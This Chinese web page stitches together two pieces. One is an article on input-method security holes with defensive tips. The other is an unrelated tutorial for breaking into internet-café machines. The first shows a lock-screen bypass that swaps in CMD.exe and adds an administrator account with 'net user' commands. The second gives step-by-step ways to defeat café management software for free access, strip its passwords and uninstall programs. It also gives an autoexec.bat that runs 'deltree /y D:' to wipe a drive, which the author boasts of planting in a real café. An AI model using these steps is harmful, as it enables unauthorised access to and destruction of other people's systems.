擦亮双眼看透输入法安全漏洞

输入法作为每个用户必备的组件，它存在于每部电脑中，并且用户使用的频率极高，因此自然成为很多黑客、木马特别青睐的对象。比如苹果公司就限制第三方输入法进驻iOS系统，主要就是

本文最后更新时间： 2023-03-26 13:47:22

输入法作为每个用户必备的组件，它存在于每部电脑中，并且用户使用的频率极高，因此自然成为很多黑客、木马特别青睐的对象。比如苹果公司就限制第三方输入法进驻iOS系统，主要就是因为输入法极容易有漏洞。那么输入法有哪些常见的漏洞，我们又应该怎么进防范？

小知识：Windows 2000著名输入法漏洞

在Windows 2000登录界面，切换至全拼输入法状态，如果此时选择其中的“帮助”，在新弹出的选项里选择“输入法入门→输入法操作指南→选项”，接着选择“跳至URL”。此时将出现Windows 2000的系统安装路径和要求我们填入的路径的空白栏，输入“C:Windowsntsystem32”即可跳过密码直接进入系统，这就是著名的Windows 2000输入法漏洞。

因为输入法是每个用户必备的软件，而且是唯一一个可以在系统登录界面被调用的第三方组件，因此很多黑客都在盯着输入法，试图利用其漏洞入侵我们的系统。虽然自Windows 2000输入法漏洞发生后，微软已经在系统进行较为完善的改进。不过除了系统因素外，输入法本身的漏洞还是会给我们带来极大的安全隐患。下面我们以“陈桥智能输入法 6.6版”为例，在Windows 7下演示一下它的漏洞给我们带来的风险。

日常操作中，很多人在离开电脑一段时间时，经常会将系统锁定以免他人使用。不过在用户已经登录系统后，电脑上安装了上述版本的陈桥输入法，那么在锁定界面仍然可以调用陈桥输入法。而陈桥输入法又可以调用其他输入法组件，比如在输入法状态栏右击选择“数据管理”，这样就会调用默认路径下的“C:chenghu2CHENZNWB.EXE”（图9）。

图9 右击状态栏调用程序漏洞

上述操作在用户锁定界面仍然可以实现，正是这个漏洞会给我们系统带来安全隐患。如果有不怀好意的人将CHENZNWB.EXE替换为其他程序如CMD.exe，这样他就可以在锁定界面进入我们的系统了。

假设我们已经将CMD.exe改名为CHENZNWB.EXE并放置在上述目录，现在在Windows 7锁定界面随便输入几个字符登录，在系统提示用户密码错误时，点击屏幕左上角输入法图标切换到“陈桥输入法”。继续输入任意几个字符调出输入法状态栏，同上右击选择“数据管理”，这样即可在登录界面调出命令提示符界面。由于此时登录的是系统内置的SYSTEM账户，它拥有极高的操作权限，按提示输入下列命令即可添加管理员账户（图10）：

Net user cfan1 123456 /add

net localgroup administrators cfan /add

这样我们即可在当前系统下新增一个名为cfan1的系统管理员账户，返回登录界面即可使用这个账户进入你的系统了。

图10 在锁定界面添加管理员账户

扎好篱笆——保护输入安全

文|俞木发

从前面的文章可以看出，输入法漏洞会给系统带来极大的安全问题。除此之外，很多输入法还爆出其他安全隐患，比如搜狗输入法漏洞会泄漏用户隐私信息，QQ输入法在Windows 8下的提权漏洞，智能ABC输入法漏洞可以可以终止电脑任意进程等。虽然这些漏洞已经被修复，但是谁都不能保证其他输入法还会不会有类似的漏洞，为了保护系统和输入安全，及时解决输入法漏洞带来的危害，我们应该采取如下安全措施。

及时升级输入法

最简单的方法是用好输入法的自动升级功能，这样旧版漏洞可以及时进行修复。比如搜狗输入法，只要进入设置界面切换到“高级”，然后在“升级选项”下设置为“自动升级”即可（图11）。

图11 设置输入法自动升级

尽量使用知名输入法

并且不要轻易将第三方输入法设置为默认输入法。一些小公司的输入法软件不可避免地存在各种漏洞，使用知名公司输入法可以有效避免各种漏洞的存在。此外不要贪图使用方便，将第三方输入法设置为默认输入法，如果使用系统默认设置，在登录界面是无法调用第三方输入法组件的，这样可以杜绝黑客通过输入法漏洞入侵我们系统的通道（图12）。

图12 选择默认的系统内置输入法作为默认语言

关闭不必要的端口

大部分输入法漏洞的攻击都是借助3389这个老生常谈的端口，因此对于那些平时不用的端口，特别是那些危险性较大，又不常用的高危端口，如Telnet服务的23端口、FTP服务的21端口、SMTP服务的25端口、RPC服务的135端口等，建议将其关闭。

使用专用输入法

在网银、淘宝、在线支付输入密码时，尽量使用它们自带的控件和软键盘输入。因为默认情况下，我们在输入账号、密码时，系统是通过输入法管理器调用输入法的转换函数输入字符的。

现在很多木马可以利用键盘钩子捕获Windows键盘动作，从而轻易知道你的账户名和密码。网银的安全控件则可以对键盘钩子进行有效的隔绝，而且软键盘上字母和数字的排列是不规则的，并且每次都会随机进行变化，即使木马捕捉到也是一堆无意义的编码（图13）。

图13 建行网银使用的软键盘

小知识：网银是如何保证输入安全？

1、强制下载安全控件，只有安装控件后密码框才能输入字符，控件能够有效防止黑客及木马病毒等窃取用户输入信息。

2、使用随机排列字符实现字符的输入，即使被木马捕获也不会泄漏实际输入的字符。

3、服务器会实时对客户输入的密码进行增强加密，比如在中国移动网站使用手机登录时，我们输入的密码在提交到服务器验证的过程会被加密，如输入123456，提交后密码框会变为多位的加密字符（图14）。

图14 密码字符在提交过程会被加强加密

我要下载,可是下不了???

网吧里一般都安装了管理软件，但是漏洞很多。本篇用四节课来讲解网吧的常见漏洞以及如何利用这些漏洞......（适用于WINDOWS 98操作系统）。
今天我们主要从"输入法"和"安全模式"这两个常见漏洞入手。
第一课首先试试"安全模式"漏洞。
到网吧后开机（不要管理员解锁），一会儿屏幕出现"Starting Windows ......"时，按下"F5"键启动到"安全模式"，在"开始"→"运行"框中输入"msconfig"（回车），打开"系统配置实用程序"，用鼠标单击"启动"标签,去掉所有与网管软件有关的项，也可以在运行框中输入"regedit"打开注册表，删除注册表"HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun"下的相关键值，更残忍的干脆把网管软件给卸载掉，重新启动计算机后，就可以免费上网了。是不是很简单？不过可要当心网吧老板！如果"F5"键被屏蔽了，则应该先修改"msdos.sys"。看看下面的"输入法"漏洞，大家就知道怎么修改了。
第二课（本课以"网吧管理专家"为例）
照样先开机（启动过程别按"F5"），没有让管理员解锁的计算机在桌面上有一密码框，是用于验证用户身份的。这里分为会员和管理员，两种身份分别具有不同的使用权限。我不是管理员，所以我不知道管理员密码，在座有哪位知道的？（你不用拼命摇头啦！）没有密码照样能进入！我们可以绕到密码框后面去。用鼠标单击"会员卡号"框，利用"ctrl+shift"或"Ctrl+Space(空格键)"调出输入法，然后随意输入一个字母，在弹出的输入框上单击鼠标右键，看看有没有"帮助"。没有的话就用"Ctrl+Shift"切换输入法，直到找出"帮助"后单击它。鼠标的移动范围被限制了，可以这样破解它：按下"Alt+Space"，在弹出的标题栏菜单上（用键盘）选择"移动"，再回车两下就OK了。基础打好了，现在让我们看看这个网吧里有什么好东东，用鼠标单击"帮助"的标题栏图标（有一种帮助没有这个图标，这种帮助好像没什么利用价值）。打开控制菜单后，再单击"跳至 URL（J） ..."，在弹出的输入框中输入网址或盘符都可以，先去C盘看看，输入"C："或"file&:///C:/"。我找...... 似乎没什么好玩的。你看那网管软件，就放在这么显眼的地方，也不怕被人执行"Uninstall.exe"。...... 下面就开始上网了。：）去"新浪"逛逛，打开"跳至 URL（J）..."框，输入"sina.com.cn"("回车")，大家让一让，发生什么事了？网页内容竟然在"帮助"里显示出来了！如果要去雅虎网站，还得再单击"跳至 URL（J） ..."，麻烦了点，不如去桌面上找个IE更方便些，这次还是得单击"跳至 URL（J）..."，输入"c:windowsdesktop"(回车)，或者在刚才打开的c盘上任意选择一个文件夹，按"shift+Enter(回车)"，调出资源管理器，也可以到达桌面。
有些人想要管理员密码,你可以自已来设置一个，我惯用的方法是：打开注册表，删除"[Hkey_Local_MachineSoftware万象幻境专家系列管理软件]"下的键名"计算机解锁密码"和"运行设置程序密码"的键值（另外还有其他的密码，均已被编译，要删除就随你便啦！）改完后退出注册表并重新启动计算机，密码框不见了，然后依次单击"开始→设置→运行设置程序"，倘若你觉得该网吧限制太高，不妨把它设置低一点。如果注册表编辑器被禁止，就当我上面的话没说，我们可以用这种方法破解：
1.在IE地址栏内输入"c："，回车。
2.单击"文件"菜单，新建一份文本文档，输入如下代码：
Regedit4
[HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:01000000
将文件另存为"1.reg"，把它双击安装后就可以使用注册表编辑器了。刚才提到怎样解除"F5"的限制，利用"帮助"漏洞来解除可以，但是我想利用"快速提示"漏洞。
第三课 "输入法"中的"快速提示"漏洞
这节课教大家什么？嗯！是"输入法"中的"快速提示"漏洞，目前仅有"五笔加加"输入法有这个漏洞。照上节课教的，不过这次要大家找的是"快速提示"，而不是"帮助"，切换输入法，找到"快速提示"后单击它，这时出现一个IE窗口（不是太菜的你应该知道干什么用的，上网用的呗！），鼠标移动范围被限制了，破解它（上节课教过了，但是如果IE窗口是最大化的，则应该先在控制菜单中选择"恢复为小窗口"后再"移动"，再按"回车"），这样便可免费上网了，需要打开桌面，最简单的方法是：在IE地址栏上输入"桌面"（回车）。回顾一下第一节课主要说了什么......嗯！利用"F5"漏洞免费上网，大多被屏蔽掉了，第二节课说过要利用"快速提示"漏洞来解除它。怎么做呢？（大家笔拿起来做些笔记），"msdos.sys"文件在C盘根目录下一般是以"隐藏"和"只读"形式储存的，我们需要先去掉它的"只读"属性，要不然无法对它做任何修改，在IE地址栏上输入"file&:///C:/command.com"回车，打开"ms-dos方式"，在提示符下输入 "attrib -r c:msdos.sys"(回车)以去掉"只读"属性，再返回到IE地址栏上输入"file&:///C:/msdos.sys"（回车），把"打开方式"设为"记事本"，把"option"下的"BootKeys"的值改为"1"，保存退出。重新启动计算机便可使修改生效。
上面讲的都是以"网吧管理专家"网管软件为例，如果是"美萍"控制的计算机，得先打开"开始→会员登陆"，接下来与"网吧管理专家"操作过程相同。再补充一点，其实免费上网还有一种方法，不过成功率不高，就是使网管软件出错，我是用键盘上的"Ctrl、Shift、Alt"三个键中任一键或任两键配合其他键狂按，结果网管软件报错退出,"我的电脑"和"回收站"等都出现在桌面上了。
第四课一些破坏网吧数据的方法（那位耳朵伸得那么长，想必是网德不善者）。
破坏1（破坏级别：中）：
在IE"地址栏"或"jump to URL"中输入"file：///c：/windows/control.exe"，打开"控制面板→ 添加/删除程序"，卸载掉你"感兴趣"的应用程序。
破坏2（破坏级别：中→高）：
为了防止文件被删除，网管软件一般都屏蔽了鼠标右键，并且连键盘上的"Delete"和"Shift+Delete"也无效，不过据我所知，在"网吧管理专家"控制下的数据可以用"Ctrl+D"来删除。
破坏3（破坏级别：高）：
修改C盘根目录下的"autoexec.bat"文件为如下代码：
@echo off
path=c:windows;c:windowscommand
smartdrv >nul
deltree /y D:. >nul
这些代码是我前段时间在某网吧里预留的，后果只是使硬盘D分区的数据全部丢失而已，但计算机仍可启动（因为操作系统被装在C盘），若将第四段代码的"D:"改为"C:"，有什么后果？你试试就知道了，像我这样心地善良，乐于助人的人，是不会那么做的。
参考资料：http://3414.blogchina.com/501100.html